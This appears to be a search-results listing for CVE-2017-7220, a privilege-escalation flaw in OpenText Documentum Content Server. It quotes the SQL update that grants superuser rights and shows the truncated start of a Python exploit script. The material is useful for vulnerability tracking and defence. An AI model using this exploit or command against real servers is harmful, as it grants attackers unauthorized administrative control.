3 matches found
CVE-2017-7220
OpenText Documentum Content Server has a vulnerability where an attacker can gain superuser access by saving a crafted object via sys_obj_save (or saving an object) and issuing an unauthorized UPDATE dm_dbo.dm_user_s SET user_privileges=16, i.e., the so‑called RPC save-commands attack. This CVE (...
CVE-2017-7220
OpenText Documentum Content Server allows superuser access via sys_obj_save or save of a crafted object, followed by an unauthorized "UPDATE dm_dbo.dm_user_s SET user_privileges=16" command, aka an "RPC save-commands" attack. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-453...
OpenText Documentum Content Server Privilege Evaluation
CVE-2017-7220-01.py:
    #!/usr/bin/env python
    import socket
    import sys
    from os.path import basename
    from dctmpy.docbaseclient import DocbaseClient
    from dctmpy.obj.typedobject import TypedObject
    CIPHERS = "ALL:aNULL:!eNULL"
    def usage():
        print "usage:\n\t%s host port user password" % basename(sys.argv[0])
    de...